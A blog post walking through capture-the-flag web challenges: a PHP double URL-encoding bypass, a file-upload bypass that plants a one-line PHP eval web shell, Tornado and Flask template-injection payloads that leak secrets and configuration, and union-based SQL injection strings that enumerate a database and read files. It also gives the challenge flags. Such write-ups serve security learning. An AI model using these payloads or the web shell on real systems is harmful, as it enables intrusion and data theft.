Fading Coder

One Final Commit for the Last Sprint

Home > Tech > Content

Web Security Challenges: PHP, SSTI, SQL Injection, and More

Tech May 17 1

PHP Vulnerability Exploitation

The target page reveals no obvious clues through packet capture or backend scanning. A search for write-ups (WP) indicates the presence of .phps files. Accessing index.phps displays source code:

<?php
if("admin" === $_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin") {
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

To bypass the condition "admin" === $_GET[id], the script applies URL decoding twice—once from browser decoding and once within the code.

Encoding admin twice results in %2561%2564%256d%2569%256e. After two decodes, it becomes admin.

The resulting flag is:

cyberpeace{a66b41e93a4251c196c8e734a663f422}

Notes on URL Encoding

URL encoding prefixes hexadecimal values with a percent sign.

.PHPS Files

PHPS files are associated with PHP Group's "PHP Source" type. When properly configured, servers display the source code instead of executing it.

File Upload Exploitation

Upon accessing the upload interface, it requires image uploads. Using packet capture shows frontend file type checks. Removing the check() function from the source allows successful upload of a PHP shell named aaa.php:

<?php
@eval($_REQUEST['aaa']);
?>

After uploading, connect via AntSword. The flag.php file is located in the html directory, revealing the flag:

cyberpeace{ea8e46f9161212e0a9983fd3794ac7a2}

SSTI in Tornado Framework

The web interface presents three links:

  • /flag.txt: Returns /flag.txt and /fllllllllllllag
  • /welcome.txt: Returns render
  • /hints.txt: Indicates md5(cookie_secret+md5(filename))

Attempting to access /fllllllllllllag returns 404.

The /welcome.txt hint suggests potential SSTI. Testing with msg={{999}} produces output, confirming the vulnerability.

Testing operations like msg={{2*3}} fails with ORZ responses, indicating operator filtering.

To extract the cookie secret, use:

{{ handler.settings }}

Given:

  • Cookie secret: df7c68e3-32f2-47e3-b5c2-370bff4bd799
  • MD5 of path: 3bf9f6cf685a6dd8defadabfb41a03a1

Compute:

md5("df7c68e3-32f2-47e3-b5c2-370bff4bd799" + "3bf9f6cf685a6dd8defadabfb41a03a1") = e506787701926864f020c1bf83a57d29

Final flag:

flag{3f39aea39db345769397ae895edb9c70}

Flask SSTI Vulnerability

The application exposes source code:

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

A test payload:

http://220.249.52.133:44363/shrine/{{2*10}}

The application filters parentheses and blocks config and self. Bypassing with:

{{url_for.__globals__['current_app'].config}}

Reveals the flag:

flag{shrine_is_good_ssti}

SQL Injection in Fakebook

After registering, navigating to a profile URL suggests a GET-based SQL injection.

Testing queries:

no=4
no=4'
no=4 and 1=1
no=4 and 1=2

Using ORDER BY confirms four columns.

Bypassing filter using comment syntax:

no=-4 union/**/select 1,2,3,4#

Retrieving database name:

no=-4 union/**/select 1,database(),3,4--+

Enumerating schemas:

no=-4 union/**/select 1,group_concat(schema_name) ,3,4 from information_schema.schemata#

Schema list:

fakebook,information_schema,mysql,performance_schema,test

Checking tables in fakebook:

no=-4 union/**/select 1,group_concat(table_name) ,3,4 from information_schema.tables where table_schema="fakebook"#

Table name:

users

Checking columns:

no=-4 union/**/select 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema="fakebook"#

Columns:

no,username,passwd,data

Examining the data column reveals serialized data. Fetching its contents:

no=-4 union/**/select 1,group_concat(data),3,4 from fakebook.users #

Accessing the flag via file read:

no=-4 union/**/select 1,load_file("/var/www/html/flag.php"),3,4

Final flag:

flag{c1e552fdf77049fabf65168f22f7aeab}
Tags: web-securityPHPSSTIsql-injection
Back to List

Prev: Advanced Selenium WebDriver Techniques: Frames, Windows, and JavaScript Execution

Next: Installing Kubernetes Dashboard with Registry Mirror Solutions

Related Articles

Understanding Strong and Weak References in Java

Strong References Strong reference are the most prevalent type of object referencing in Java. When an object has a strong reference pointing to it, the garbage collector will not reclaim its memory. F...

Comprehensive Guide to SSTI Explained with Payload Bypass Techniques

Introduction Server-Side Template Injection (SSTI) is a vulnerability in web applications where user input is improper handled within the template engine and executed on the server. This exploit can r...

Implement Image Upload Functionality for Django Integrated TinyMCE Editor

Django’s Admin panel is highly user-friendly, and pairing it with TinyMCE, an effective rich text editor, simplifies content management significantly. Combining the two is particular useful for bloggi...

Leave a Comment

Anonymous

◎Feel free to join the discussion and share your thoughts.

Copyright © fadingcoder.top